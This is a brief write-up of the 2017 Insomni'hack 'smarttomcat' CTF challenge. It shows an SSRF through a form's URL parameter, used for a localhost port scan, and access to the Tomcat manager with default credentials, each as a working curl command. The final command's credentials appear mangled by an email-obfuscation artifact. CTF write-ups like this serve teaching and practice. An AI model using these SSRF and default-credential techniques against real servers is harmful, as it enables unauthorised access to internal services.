Writeup
The Insomni’hack teaser 2017 was a fun CTF with a good spread between easy and hard challenges.

The smarttomcat challenge was an easy web challenge that was about
attacking a badly secured tomcat server, as a user you where presented
with a webpage that had an backend written in php, that backend called a
tomcat server on localhost.

When looking at the form post data from the browser it became
apparant that the url that the backend called was submitted by the form.

This enabled us to write a port scan as a simple bash loop:


<span>for x in $(seq 1 65535); do echo $x >> /tmp/log && curl 'http://smarttomcat.teaser.insomnihack.ch/index.php' --data "u=http%3A%2F%2Flocalhost%3A$x%2F" >> /tmp/log;done


</span>This didn’t really help us. And we realized that we could access the
tomcat management url on the same port as the rest of the application. A
simple google gave us the default username and password.


Solution

<span><span>curl 'http://smarttomcat.teaser.insomnihack.ch/index.php' --data 'u=http://tomcat:[email protected]:8080/manager/html'
</span>
</span>